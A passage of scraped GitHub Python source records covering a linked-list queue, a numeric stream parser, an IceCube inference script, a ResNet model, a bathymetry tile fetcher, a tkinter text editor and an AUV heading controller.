\nplt.show()\n","repo_name":"masaRisu/fstsp","sub_path":"PDSTSP.py","file_name":"PDSTSP.py","file_ext":"py","file_size_in_byte":4913,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"10750110867","text":"from solutions.ch7.Empty import Empty\nfrom solutions.ch7.LinkedList import LinkedList, printList\n\nclass LinkedQueue:\n \n def __init__(self) -> None:\n self._data = LinkedList()\n \n def __len__(self):\n return len(self._data)\n \n def is_empty(self):\n return self._data.is_empty()\n\n def enqueue(self, e):\n self._data.add_last(e)\n\n def dequeue(self):\n if self.is_empty():\n raise Empty('Queue is empty')\n e = self._data.delete_first()\n return e\n\n def rotate(self):\n old_head = self._data.first()\n old_tail = self._data.last()\n\n self._data._head = old_head._next\n old_tail._next = old_head\n\n self._data._tail = old_head\n old_head._next = None\n\n '''\n 7.26 Implement a method, concatenate(Q2) for the LinkedQueue class that\n takes all elements of LinkedQueue Q2 and appends them to the end of the\n original queue. The operation should run in O(1) time and should result\n in Q2 being an empty queue.\n '''\n def concatenate(self, q):\n self._data._tail._next = q._data._head\n self._data._tail = q._data._tail\n self._data._size += q._data._size\n\n q._data._head, q._data._tail = None, None\n q._data._size = 0\n\ndef usage():\n q = LinkedQueue()\n q.enqueue(1)\n q.enqueue(2)\n q.enqueue(3)\n \n q.rotate()\n q.rotate()\n q.rotate()\n printList(q._data)\n\n p = LinkedQueue()\n p.enqueue(4)\n p.enqueue(5)\n p.enqueue(6)\n\n q.concatenate(p)\n printList(q._data)\n print(len(p))\n print(p.is_empty())\n\n #printList(q._data)\n #print(q.dequeue())\n #print(q.dequeue())\n #print(q.dequeue())\n #print(q.is_empty())\n\nif __name__ == \"__main__\":\n usage()","repo_name":"itma96/Data-Structures-And-Algorithms-In-Python","sub_path":"solutions/ch7/LinkedQueue.py","file_name":"LinkedQueue.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35224241782","text":"import sys\n\nfrom typing import Iterator\nfrom typing import List\nfrom typing import Optional\nfrom typing import TextIO\nfrom typing import Union\n\nfrom .exceptions import StreamProcessingError\n\n\nclass StreamProcessor:\n def __init__(\n self,\n path: Optional[str] = None,\n sep: str = None,\n encoding: str = \"utf-8\",\n flatten: bool = False,\n ignore_invalid: bool = False,\n ):\n self._path = path\n self._sep = sep\n self._ignore_invalid = ignore_invalid\n self._encoding = encoding\n self._flatten = flatten\n\n self._stream = None # type: Optional[TextIO]\n self._stream_iter = None # type: Optional[Iterator[List[float]]]\n self._last_line = None # type: Optional[str]\n\n @property\n def stream(self) -> TextIO:\n \"\"\"Return the stream that we're reading from\"\"\"\n if not self._stream is None:\n return self._stream\n if self._path is None:\n self._stream = sys.stdin\n else:\n self._stream = open(self._path, \"r\", encoding=self._encoding)\n return self._stream\n\n @property\n def last_line(self) -> Optional[str]:\n \"\"\"The most recently parsed line\"\"\"\n return self._last_line\n\n def close_stream(self):\n if self._stream is None:\n return\n if self._stream == sys.stdin:\n return\n self._stream.close()\n\n def __iter__(self) -> \"StreamProcessor\":\n self._stream_iter = self.process_stream()\n return self\n\n def __next__(self) -> List[float]:\n assert not self._stream_iter is None\n return next(self._stream_iter)\n\n def process_stream(self) -> Iterator[List[float]]:\n \"\"\"Process the input stream\"\"\"\n for line in self.stream:\n self._last_line = line\n\n # Skip empty lines\n if not line.strip():\n continue\n\n # Split the line in case of multidimensional data\n parts = line.split(sep=self._sep)\n\n # Parse numbers from text\n values = list(map(self.parse_numeric, parts))\n\n # Flatten the input array if desired\n if self._flatten:\n for value in values:\n yield [value]\n else:\n yield values\n self.close_stream()\n\n def parse_numeric(self, x: str) -> float:\n \"\"\"Parse a string number, preserving type\"\"\"\n x = x.rstrip(\"\\r\\n\")\n parse_func = float if \".\" in x else int\n try:\n return parse_func(x)\n except ValueError:\n pass\n if self._ignore_invalid:\n return float(\"nan\")\n self.close_stream()\n raise StreamProcessingError(x)\n","repo_name":"GjjvdBurg/Veld","sub_path":"veld/stream_processor.py","file_name":"stream_processor.py","file_ext":"py","file_size_in_byte":2741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16469169142","text":"import argparse\nimport numpy as np\nimport pandas as pd\nfrom icecube_utils import (\n inference, \n load_pretrained_model\n)\nfrom train_large import build_parser, configure, seed_everything\n\n\ndef parse_args():\n parser = build_parser()\n parser.add_argument('--test-db-path', type=str, default='/kaggle/working/test_database.db')\n parser.add_argument('--save-path', type=str, default='/kaggle/working/submission.csv')\n parser.add_argument('--num-workers', type=int, default=3)\n parser.add_argument('--max-n-pulses', type=int, default=None)\n return parser.parse_args()\n\n\ndef prepare_dataframe(df, angle_post_fix = '_reco', vec_post_fix = '') -> pd.DataFrame:\n r = np.sqrt(df['direction_x'+ vec_post_fix]**2 + df['direction_y'+ vec_post_fix]**2 + df['direction_z' + vec_post_fix]**2)\n df['zenith' + angle_post_fix] = np.arccos(df['direction_z'+ vec_post_fix]/r)\n df['azimuth'+ angle_post_fix] = np.arctan2(df['direction_y'+ vec_post_fix],df['direction_x' + vec_post_fix]) #np.sign(results['true_y'])*np.arccos((results['true_x'])/(np.sqrt(results['true_x']**2 + results['true_y']**2)))\n df.loc[df['azimuth' + angle_post_fix]<0, 'azimuth'+ angle_post_fix] = df['azimuth' + angle_post_fix][df['azimuth' + angle_post_fix]<0] + 2*np.pi \n\n drop_these_columns = []\n for column in df.columns:\n if column not in ['event_id', 'zenith', 'azimuth']:\n drop_these_columns.append(column)\n return df.drop(columns = drop_these_columns).iloc[:,[0,2,1]].set_index('event_id')\n\n\ndef main(args):\n seed_everything(0)\n config = configure(args)\n\n config['train_mode'] = 'default'\n config['dataset_type'] = 'sqlite'\n config['train_transforms'] = []\n config['batch_size'] = args.batch_size\n config['num_workers'] = args.num_workers\n config['path'] = args.test_db_path\n config['inference_database_path'] = args.test_db_path\n config['fit']['distribution_strategy'] = 'ddp'\n\n config['max_n_pulses']['max_n_pulses'] = None\n if args.max_n_pulses is not None:\n config['max_n_pulses']['max_n_pulses'] = args.max_n_pulses\n config['max_n_pulses']['max_n_pulses_strategy'] = 'clamp' \n\n model = load_pretrained_model(\n config=config, \n path=str(args.state_dict_path),\n return_train_dataloader=False,\n )\n model.additional_attributes = ['event_id']\n\n df = inference(\n model.cuda(), \n config,\n use_labels=False\n )\n\n df['event_id'] = df['event_id'].astype(int)\n df = df.sort_values(by='event_id')\n df = prepare_dataframe(df, angle_post_fix='', vec_post_fix='')\n df.to_csv(args.save_path)\n\n\nif __name__ == '__main__':\n args = parse_args()\n main(args)\n","repo_name":"mkotyushev/icecube","sub_path":"submit.py","file_name":"submit.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3518295953","text":"# from https://towardsdatascience.com/residual-network-implementing-resnet-a7da63c7b278\nimport torch\nfrom torch import nn\nfrom functools import partial\nfrom . import building_block as BB\nfrom . import CNN_basic as CB\n\n\nclass Conv2dAuto(nn.Conv2d):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.padding = (self.kernel_size[0] // 2, self.kernel_size[1] // 2)\n # dynamic add padding based on the kernel_size\n\n\ndef activation_func(activation):\n return nn.ModuleDict([\n ['relu', nn.ReLU(inplace=True)],\n ['leaky_relu', nn.LeakyReLU(negative_slope=0.01, inplace=True)],\n ['selu', nn.SELU(inplace=True)],\n ['none', nn.Identity()]\n ])[activation]\n\n\nclass ResidualBlock(nn.Module):\n def __init__(self, in_channels, out_channels, activation='relu',\n *args, **kwargs):\n super().__init__()\n self.in_channels, self.out_channels, self.activation = \\\n in_channels, out_channels, activation\n self.blocks = nn.Identity()\n self.activate = activation_func(activation)\n self.shortcut = nn.Identity()\n\n def forward(self, x):\n residual = x\n if self.should_apply_shortcut:\n residual = self.shortcut(x)\n x = self.blocks(x)\n x += residual\n x = self.activate(x)\n return x\n\n @property\n def should_apply_shortcut(self):\n return self.in_channels != self.out_channels\n\n\nclass ResNetResidualBlock(ResidualBlock):\n def __init__(self, in_channels, out_channels, expansion=1, downsampling=1,\n *args, **kwargs):\n conv = partial(Conv2dAuto, kernel_size=3, bias=False)\n super().__init__(in_channels, out_channels, *args, **kwargs)\n self.expansion, self.downsampling, self.conv = expansion, downsampling, conv\n self.shortcut = nn.Sequential(\n nn.Conv2d(self.in_channels, self.expanded_channels, kernel_size=1,\n stride=self.downsampling, bias=False),\n nn.BatchNorm2d(self.expanded_channels)) if self.should_apply_shortcut else None\n \n @property\n def expanded_channels(self):\n return self.out_channels * self.expansion\n \n @property\n def should_apply_shortcut(self):\n return self.in_channels != self.expanded_channels\n\ndef conv_bn(in_channels, out_channels, conv, *args, **kwargs):\n return nn.Sequential(conv(in_channels, out_channels, *args, **kwargs), \n nn.BatchNorm2d(out_channels))\n\nclass ResNetBasicBlock(ResNetResidualBlock):\n \"\"\"\n Basic ResNet block composed by two layers of 3x3conv/batchnorm/activation\n \"\"\"\n expansion = 1\n def __init__(self, in_channels, out_channels, *args, **kwargs):\n super().__init__(in_channels, out_channels, *args, **kwargs)\n self.blocks = nn.Sequential(\n conv_bn(self.in_channels, self.out_channels, conv=self.conv, bias=False, stride=self.downsampling),\n activation_func(self.activation),\n conv_bn(self.out_channels, self.expanded_channels, conv=self.conv, bias=False),\n )\n \nclass ResNetBottleNeckBlock(ResNetResidualBlock):\n expansion = 4\n def __init__(self, in_channels, out_channels, *args, **kwargs):\n super().__init__(in_channels, out_channels, expansion=4, *args, **kwargs)\n self.blocks = nn.Sequential(\n conv_bn(self.in_channels, self.out_channels, self.conv, kernel_size=1),\n activation_func(self.activation),\n conv_bn(self.out_channels, self.out_channels, self.conv, kernel_size=3, stride=self.downsampling),\n activation_func(self.activation),\n conv_bn(self.out_channels, self.expanded_channels, self.conv, kernel_size=1),\n )\n\nclass ResNetLayer(nn.Module):\n \"\"\"\n A ResNet layer composed by `n` blocks stacked one after the other\n \"\"\"\n def __init__(self, in_channels, out_channels, block=ResNetBasicBlock, n=1,\n *args, **kwargs):\n super().__init__()\n # 'We perform downsampling directly by convolutional layers that have a stride of 2.'\n downsampling = 2 if in_channels != out_channels else 1\n self.blocks = nn.Sequential(\n block(in_channels , out_channels, *args, **kwargs,\n downsampling=downsampling),\n *[block(out_channels * block.expansion, \n out_channels, downsampling=1, *args, **kwargs) for _ in range(n - 1)]\n )\n\n def forward(self, x):\n x = self.blocks(x)\n return x\n\nclass ResNetEncoder(nn.Module):\n \"\"\"\n ResNet encoder composed by layers with increasing features.\n Args:\n `in_channels`: number of channels in the input image\n `block_sizes`: number of channels in each layer\n `depths`: number of resnet blocks\n \"\"\"\n def __init__(self, in_channels=3, blocks_sizes=[64, 128, 256, 512], \n depths=[2,2,2,2], activation='relu', block=ResNetBasicBlock,\n *args, **kwargs):\n super().__init__()\n self.blocks_sizes = blocks_sizes\n \n # first layer\n self.gate = nn.Sequential(\n nn.Conv2d(in_channels, self.blocks_sizes[0], kernel_size=7,\n stride=2, padding=3, bias=False),\n nn.BatchNorm2d(self.blocks_sizes[0]),\n activation_func(activation),\n nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n )\n \n self.in_out_block_sizes = list(zip(blocks_sizes, blocks_sizes[1:]))\n self.blocks = nn.ModuleList([ \n ResNetLayer(blocks_sizes[0], blocks_sizes[0], n=depths[0],\n activation=activation, block=block,*args, **kwargs),\n *[ResNetLayer(in_channels * block.expansion, \n out_channels, n=n, activation=activation, \n block=block, *args, **kwargs) \n for (in_channels, out_channels), n in zip(self.in_out_block_sizes, depths[1:])] \n ])\n \n def forward(self, x):\n x = self.gate(x)\n for block in self.blocks: x = block(x)\n return x\n\nclass ResNet(nn.Module):\n def __init__(self, in_channels, n_classes, add_sigmoid='None',\n times_max=1, extra_features=0, dropout=0, *args, **kwargs):\n super().__init__()\n self.encoder = ResNetEncoder(in_channels, *args, **kwargs)\n self.decoder = CB.CNN2d_decoder(self.encoder.blocks[-1].blocks[-1].expanded_channels, n_classes)\n self.add_sigmoid = add_sigmoid\n self.times_max = times_max\n \n def forward(self, x):\n if type (x) == torch.Tensor:\n x = self.encoder(x)\n x = self.decoder(x)\n elif type (x) == list:\n encoder_x = self.encoder (x[0])\n x = self.decoder ([encoder_x, x[1]])\n return BB.act_func (x, self.add_sigmoid, self.times_max)\n\ndef resnet2d_n (in_channels, n_classes, model_type='resnet18', **kwargs):\n if model_type == 'resnet2d_18':\n return ResNet(in_channels, n_classes, block=ResNetBasicBlock,\n depths=[2, 2, 2, 2], **kwargs)\n elif model_type == 'resnet2d_34':\n return ResNet(in_channels, n_classes, block=ResNetBasicBlock,\n depths=[3, 4, 6, 3], **kwargs)\n elif model_type == 'resnet2d_50':\n return ResNet(in_channels, n_classes, block=ResNetBottleNeckBlock,\n depths=[3, 4, 6, 3], **kwargs)\n elif model_type == 'resnet2d_101':\n return ResNet(in_channels, n_classes, block=ResNetBottleNeckBlock,\n depths=[3, 4, 23, 3], **kwargs)\n","repo_name":"Yutong441/fICHnet","sub_path":"fICHnet/CNN/resnet_2d.py","file_name":"resnet_2d.py","file_ext":"py","file_size_in_byte":7553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30989487763","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Source code for the MAR_gravity ETOPO source dataset class.\"\"\"\n\nimport os\nimport subprocess\nimport numpy\n\nTHIS_DIR = os.path.split(__file__)[0]\n\n##############################################################################\n# Code for importing the /src directory so that other modules can be accessed.\nimport import_parent_dir\nimport_parent_dir.import_src_dir_via_pythonpath()\n##############################################################################\n\nimport datasets.etopo_source_dataset as etopo_source_dataset\nimport datasets.dataset_geopackage as dataset_geopackage\n\nclass source_dataset_MAR_gravity(etopo_source_dataset.ETOPO_source_dataset):\n \"\"\"Look in \"src/datasets/etopo_source_dataset.py\" to get base class definition.\"\"\"\n def __init__(self,\n configfile = os.path.join(THIS_DIR, \"MAR_gravity_config.ini\" )):\n \"\"\"Initialize the MAR_gravity source dataset object.\"\"\"\n\n super(source_dataset_MAR_gravity, self).__init__(\"MAR_gravity\", configfile)\n\n def fetch_tiles(self, resolution_s=15, crm_only_if_1s=True, verbose=True):\n \"\"\"Using the CUDEM 'fetches' module, create all the tiles needed for this dataset.\"\"\"\n etopo_gpkg = dataset_geopackage.ETOPO_Geopackage(resolution = resolution_s)\n etopo_gdf = etopo_gpkg.get_gdf(crm_only_if_1s=crm_only_if_1s,\n resolution_s=resolution_s,\n verbose=verbose).copy()\n\n # Loop through all the ETOPO files and create an identical tile in this dataset.\n for i, row in etopo_gdf.iterrows():\n xleft = row.xleft\n xright = numpy.round(xleft + (row.xsize*row.xres))\n ytop = row.ytop\n ybottom = numpy.round(ytop + (row.ysize*row.yres))\n\n mar_tile_fname = os.path.join(self.config._abspath(self.config.source_datafiles_directory),\n self.config.datafiles_name_template.format(resolution_s,\n \"N\" if ybottom >= 0 else \"S\",\n abs(int(numpy.round(ybottom))),\n \"E\" if xleft >= 0 else \"W\",\n abs(int(numpy.round(xleft)))))\n\n fetches_command = [\"waffles\", \"-M\", \"surface\",\n \"-R\", \"{0}/{1}/{2}/{3}\".format(xleft,xright,ybottom,ytop),\n \"-E\", \"{0}s\".format(resolution_s),\n \"--t_srs\", \"EPSG:4326\",\n \"-O\", os.path.splitext(mar_tile_fname)[0],\n \"-F\", \"GTiff\",\n \"mar_grav\"]\n\n print(\" \".join(fetches_command))\n\n # p = subprocess.run(fetches_command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, text=True)\n p = subprocess.run(fetches_command)\n if (not ((p.returncode == 0) or os.path.exists(mar_tile_fname))) and verbose:\n print(\"ERROR: '{0}' sent return code {1}:\".format(\" \".join(fetches_command), p.returncode))\n print(p.stdout)\n\n if verbose:\n print(\"{0}/{1} {2} {3}written.\".format(i+1, len(etopo_gdf), os.path.split(mar_tile_fname)[1], \"\" if os.path.exists(mar_tile_fname) else \"NOT \"))\n\n return\n\n\nif __name__ == \"__main__\":\n mar = source_dataset_MAR_gravity()\n mar.fetch_tiles(resolution_s=15)\n mar.fetch_tiles(resolution_s=1)\n","repo_name":"ciresdem/ETOPO","sub_path":"src/datasets/MAR_gravity/source_dataset_MAR_gravity.py","file_name":"source_dataset_MAR_gravity.py","file_ext":"py","file_size_in_byte":3681,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"2431799565","text":"import tkinter as tk\nfrom tkinter import filedialog\nfrom tkinter import messagebox\n# from tkinter import a\n\n\nclass Menubar:\n\n def __init__(self,parent):\n font_specs = (\"ubuntu\",14)\n menubar = tk.Menu(parent.master,font = font_specs) #passing the window\n parent.master.config(menu = menubar)\n\n file_dropdown = tk.Menu(menubar,font = font_specs,tearoff = 0) # tearoff so that you dont take menu withyourself\n file_dropdown.add_command(label = \"New File\",accelerator = \"Ctrl+N\",command = parent.new_file)\n file_dropdown.add_command(label = \"Open File\",accelerator = \"Ctrl+O\",command = parent.open_file)\n file_dropdown.add_command(label = \"Save File\",accelerator = \"Ctrl+S\",command = parent.save)\n file_dropdown.add_command(label = \"Save Ass\",accelerator = \"Ctrl+shift+S\",command = parent.saveas )\n file_dropdown.add_separator()\n file_dropdown.add_command(label = \"Exit\",command = parent.master.destroy)\n\n menubar.add_cascade(label = \"Basic\", menu = file_dropdown)\n\n\n about_dropdown = tk.Menu(menubar,font = font_specs,tearoff = 0)\n about_dropdown.add_command(label = \"Source code\",command = self.show_abtmenu)\n about_dropdown.add_separator()\n about_dropdown.add_command(label = \"About\",command = self.sour_cecoed)\n\n menubar.add_cascade(label = \"About\", menu = about_dropdown)\n\n def show_abtmenu(self):\n box_title = \"This is a Patra 1.01\"\n box_meage = \"Multithreading is still pending\"\n messagebox.showinfo(box_title,box_meage)\n\n def sour_cecoed(self):\n box_title = \"Currently a private project\"\n box_meage = \"Not yet available\"\n messagebox.showinfo(box_title, box_meage)\n\n\nclass Statubar:\n def __init__(self,parent):\n self.status = tk.StringVar()\n self.status.set(\"Patra - 0.1 contain\")\n font_specs = (\"ubuntu\", 14)\n\n\n label = tk.Label(parent.textarea , textvariable = self.status , fg = \"black\" , bg = \"lightgrey\",anchor = 'sw',font = font_specs)\n label.pack(side = tk.BOTTOM , fill = tk.BOTH)\n def update_status(self,*args):\n if isinstance(args[0],bool):\n self.status.set(\" You just saved your ass !\")\n else:\n self.status.set(\"Patra - 0.1 contain !\")\n\n\nclass Command:\n def __init__(self,parent):\n self.status = tk.StringVar()\n self.status.set(\"i\")\n font_specs = (\"ubuntu\", 14)\n\n\n label = tk.Label(parent.textarea , textvariable = self.status , fg = \"black\" , bg = \"lightgrey\",anchor = 'sw',font = font_specs)\n label.pack(side = tk.BOTTOM , fill = tk.BOTH)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#parent class\nclass Pytest:\n def __init__(self,master):\n\n\n master.title(\"Untitle - No Name\")\n master.geometry(\"1200x700\")\n\n\n\n font_specs = (\"ubuntu\",18)\n\n self.master = master # access master in Child class Menubar\n\n self.filename = None\n\n\n self.textarea = tk.Text(master,font = font_specs)\n self.scroll = tk.Scrollbar(master,command = self.textarea.yview)\n self.textarea.configure(yscrollcommand = self.scroll.set)\n self.textarea.pack(side = tk.LEFT,fill = tk.BOTH,expand = True)\n self.scroll.pack(side = tk.RIGHT,fill = tk.Y)\n\n self.menubar = Menubar(self) # gone in init\n self.statusbar = Statubar(self)\n self.commandbar = Command(self)\n self.bind_shortcuts()\n\n # set window title?\n\n def set_window_title(self,name = None):\n if name:\n # self.filename = nme\n self.master.title(name+ \" -Patra1.01\")\n else:\n self.master.title(\"Untitled \"+ \" -Patra1.01\")\n\n\n\n\n\n\n def new_file(self,*args):\n print(\"rteached new\")\n print(*args)\n self.textarea.delete(1.0, tk.END) # clear shit\n self.filename = None\n self.set_window_title()\n\n\n # def open_file(self):\n # self.filename = filedialog.askopenfile(\n # defaultextension = \".txt\",\n # filetypes = [(\"All Files\",\"*.*\"),(\"Text Files\",\"*.txt\"),(\"Python Files\",\"*.py\"),(\"C Files\",\"*.c\"),(\"C++ Files\",\"*.cpp\")],\n #\n #\n # )\n # print(\"open\")\n # if self.filename:\n # self.textarea.delete(1.0,tk.END) #clear shit\n # print(self.filename)\n # with open(self.filename, \"r\") as f:\n # self.textarea.insert(1.0,f.read())\n # self.set_window_title(self.filename)\n #\n def open_file(self,*args):\n self.filename = filedialog.askopenfilename(\n defaultextension=\".txt\",\n filetypes=[(\"All Files\", \"*.*\"),\n (\"Text Files\", \"*.txt\"),\n (\"Python Scripts\", \"*.py\"),\n (\"Markdown Documents\", \"*.md\"),\n (\"JavaScript Files\", \"*.js\"),\n (\"HTML Documents\", \"*.html\"),\n (\"CSS Documents\", \"*.css\")])\n if self.filename:\n self.textarea.delete(1.0, tk.END)\n with open(self.filename, \"r\") as f:\n self.textarea.insert(1.0, f.read())\n self.set_window_title(self.filename)\n\n def save(self,*args):\n print(\"Ok\")\n if self.filename:\n try:\n\n txtara_contn = self.textarea.get(1.0,tk.END)\n with open(self.filename,\"w\") as g1:\n g1.write(txtara_contn)\n self.statusbar.update_status(True)\n except Exception as e:\n print(e)\n\n else:\n self.saveas()\n\n\n\n def saveas(self,*args):\n\n print(\"bnirht\")\n try:\n new_file1 = filedialog.asksaveasfilename(\n initialfile = \"Noname.txt\",\n defaultextension=\".txt\",\n filetypes=[(\"All Files\", \"*.*\"), (\"Text Files\", \"*.txt\"), (\"Python Files\", \"*.py\"), (\"C Files\", \"*.c\"),\n (\"C++ Files\", \"*.cpp\")],\n\n )\n textarea_contnt = self.textarea.get(1.0,tk.END) #get what over you wrote\n with open(new_file1,\"w\") as f1:\n f1.write(textarea_contnt)\n self.filename = new_file1\n self.statusbar.update_status(True)\n\n self.set_window_title(self.filename)\n\n\n\n\n except Exception as e:\n print(e)\n\n\n\n def bind_shortcuts(self):\n self.textarea.bind('',self.new_file)\n self.textarea.bind('',self.open_file)\n self.textarea.bind('',self.save)\n self.textarea.bind('',self.saveas)\n self.textarea.bind('',self.statusbar.update_status)\n\n\n\n\n\n\nif __name__== \"__main__\":\n master = tk.Tk()\n pt = Pytest(master)\n master.mainloop()\n # master.\n","repo_name":"Stenardt-9002/Patra-texteditor","sub_path":"Patra2/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":6741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28465694793","text":"#!/usr/bin/python\n\n\"\"\"\nA heading controller for the AUV when moving on a horizontal plane based-on PI-D strategy\n\n# Notes\n-control surface may not functioning correctly as the gains has not been tested yet\n\n######################################\n#Modifications\n2/2/2015: implement PI-D strategy instead of PID to avoid the spike in derivative term when change the demand. In correspond to this, D_gain has to be negative.\n5/4/2015: makesure CS and thruster demands are Integer32\n21/9/2015: added speed observer\n\n# TODO \n- check if the sway force distribution have been done correctly\n- include actuator transition in according to surge speed\n- moved speed observer to dead_reckoner\n\n\"\"\"\n\nimport rospy\nimport time\nimport numpy\nfrom hardware_interfaces.msg import tsl_setpoints\nfrom hardware_interfaces.msg import tail_setpoints\nfrom hardware_interfaces.msg import compass\nfrom lowlevel_controllers.msg import heading_control_PID\nfrom std_msgs.msg import Float32\nfrom std_msgs.msg import Int8\nfrom std_msgs.msg import String\nfrom hardware_interfaces.msg import status\n\nfrom delphin2_mission.utilities import uti\n\n################################################################################\n#### CONTROLLER PARAMETERS #####################################################\n################################################################################\n\ndef set_params():\n global HC\n global Ltf\n global Ltr\n global myUti\n global timeLastDemandMax\n global timeLastCallback\n global timeLastDemandProp\n global timeLastDemandProp_lim\n \n timeLastDemandMax = 1 # [sec] if there is no onOff flag updated within this many seconds, controller will be turnned off\n timeLastCallback = time.time()\n timeLastDemandProp = time.time()\n timeLastDemandProp_lim = 1 # [sec] if there is no propeller demand update within this many seconds, the demand will be set to zero\n\n ### General ###\n HC.deadzone = 0 # deadzone of the heading error [degree]\n \n ### CS Controller ###\n HC.CS_Pgain = 8. # FIXME: tune me kantapon\n HC.CS_Igain = 0\n HC.CS_Dgain = -13. # D gain has to be negative (c.f. PI-D), FIXME: tune me kantapon\n HC.CS_Smax = 30\n \n ### Thrust Controller ###\n HC.Thrust_Pgain = rospy.get_param(\"horizontal/thruster/Pgain\")\n HC.Thrust_Igain = rospy.get_param(\"horizontal/thruster/Igain\")\n HC.Thrust_Dgain = rospy.get_param(\"horizontal/thruster/Dgain\") # -30000.00 # D gain has to be negative (c.f. PI-D)\n HC.Thrust_Smax = rospy.get_param(\"thruster/SetpointMax\") # 1000 # maximum thruster setpoint\n\n ### Utility Object ###\n myUti = uti()\n \n # determine relative arm lengths for thrust allocation\n L_th = 1.24 # distance between two horizontal thrusters [metre]: measured\n cr = 1.05 # center of rotation on horizontal plane from the AUV nose [metre]: trial-and-error\n Ltf_nose = 0.205 # location of the front horizontal thruster from nose: measured\n Ltf = cr-Ltf_nose # Moment arm of front horizontal thruster from the cr [metre]\n Ltr = L_th-Ltf # Moment arm of rear horizontal thruster from the cr [metre]\n\n################################################################################\n#### CONTROL SURFACE CONTROLLER ################################################\n################################################################################\n\ndef CS_controller(error, int_error, der_error):\n global HC\n HC.CS_Pterm = error*HC.CS_Pgain\n HC.CS_Iterm = int_error*HC.CS_Igain\n HC.CS_Dterm = der_error*HC.CS_Dgain\n\n CS_demand = HC.CS_Pterm + HC.CS_Iterm + HC.CS_Dterm\n CS_demand = myUti.limits(CS_demand,-HC.CS_Smax,HC.CS_Smax)\n \n HC.CS_demand = int(round(CS_demand))\n\n return HC.CS_demand\n \n################################################################################\n########## THRUST CONTROLLER ###################################################\n################################################################################\n\ndef thrust_controller(error, int_error, der_error):\n global HC\n \n if numpy.abs(error) > HC.deadzone:\n \n HC.Thrust_Pterm = error*HC.Thrust_Pgain\n HC.Thrust_Iterm = int_error*HC.Thrust_Igain\n HC.Thrust_Dterm = der_error*HC.Thrust_Dgain\n \n HC.Thrust_heading = HC.Thrust_Pterm + HC.Thrust_Iterm + HC.Thrust_Dterm\n \n ## turn torque into thrust and superposition with sway demand\n thruster0 = float(HC.Thrust_heading)/float(Ltf+Ltr) + float(HC.sway_demand)*float(Ltr)/float(Ltf+Ltr)\n thruster1 = -float(HC.Thrust_heading)/float(Ltf+Ltr) + float(HC.sway_demand)*float(Ltf)/float(Ltf+Ltr)\n \n thruster0 = numpy.sign(thruster0)*(numpy.abs(thruster0))**0.5 # according to a relationship between thrust and rpm\n thruster1 = numpy.sign(thruster1)*(numpy.abs(thruster1))**0.5 # according to a relationship between thrust and rpm\n\n # if a setpoint of one thruster goes beyond the limit. it will be saturated and the other one will be scaled down proportionally in order to scale down torque.\n thruster0 = round(thruster0)\n thruster1 = round(thruster1)\n if numpy.abs(thruster0) > HC.Thrust_Smax:\n scale_factor = float(HC.Thrust_Smax)/float(numpy.abs(thruster0))\n thruster0 = thruster0*scale_factor\n thruster1 = thruster1*scale_factor\n if numpy.abs(thruster1) > HC.Thrust_Smax:\n scale_factor = float(HC.Thrust_Smax)/float(numpy.abs(thruster1))\n thruster0 = thruster0*scale_factor \n thruster1 = thruster1*scale_factor\n\n else:\n HC.Thrust_Pterm = 0.\n HC.Thrust_Dterm = 0.\n thruster0 = 0.\n thruster1 = 0.\n \n HC.thruster0 = int(round(thruster0))\n HC.thruster1 = int(round(thruster1))\n \n return [HC.thruster0, HC.thruster1]\n\n################################################################################\n########## MAIN CONTROL LOOP ###################################################\n################################################################################\n\ndef main_control_loop():\n\n #### SETUP ####\n global controller_onOff\n global speed\n global HC\n global propDemand\n\n propDemand = 0\n speed = 0\n controller_onOff = False\n set_params()\n\n controlRate = 5. # [Hz]\n r = rospy.Rate(controlRate)\n controlPeriod = 1/controlRate # [sec]\n \n [error, int_error, der_error] = system_state(-1,HC.heading,(HC.heading_demand)%360) # On first loop, initialize relevant parameters\n \n # to control a timing for status publishing\n timeZero_status = time.time()\n try:\n dt_status = rospy.get_param('status_timing')\n except:\n dt_status = 2.\n \n while not rospy.is_shutdown():\n # to control a timing for status publishing\n if time.time()-timeZero_status > dt_status:\n timeZero_status = time.time()\n pubStatus.publish(nodeID = 7, status = True)\n \n timeRef = time.time() \n \n if time.time()-timeLastDemandProp > timeLastDemandProp_lim:\n propDemand = 0\n try:\n speed_current = speedObserver(propDemand, speed, controlPeriod)\n speed = speed_current\n HC.speed = speed\n except:\n speed_current = 0\n speed = speed_current\n HC.speed = speed\n\n if controller_onOff == True:\n # get sampling\n heading_current = HC.heading\n heading_demand = (HC.heading_demand)%360\n \n # Get system state #\n [error, int_error, der_error] = system_state(controlPeriod,heading_current,heading_demand)\n\n # Control Surface Controller # Nb CSp = Sternplane port, CSt = Rudder top\n CS_demand = CS_controller(error, int_error, der_error)\n # Thruster controller # \n [thruster0, thruster1] = thrust_controller(error, int_error, der_error)\n \n # update the heading_control_PID.msg, and this will be subscribed by the logger.py\n pub_tail.publish(cs0 =CS_demand, cs1 = CS_demand)\n pub_tsl.publish(thruster0 = thruster0, thruster1 = thruster1)\n pub_HC.publish(HC)\n \n # watch to inactivate the controller when there is no demand specified\n if time.time()-timeLastCallback > timeLastDemandMax:\n controller_onOff = False\n else:\n HC.CS_demand = 0\n HC.thruster0 = 0\n HC.thruster1 = 0\n pub_HC.publish(HC)\n \n # verify and maintain the control rate\n timeElapse = time.time()-timeRef \n if timeElapse < controlPeriod:\n r.sleep()\n else:\n str = \"Heading control rate does not meet the desired value of %.2fHz: actual control rate is %.2fHz\" 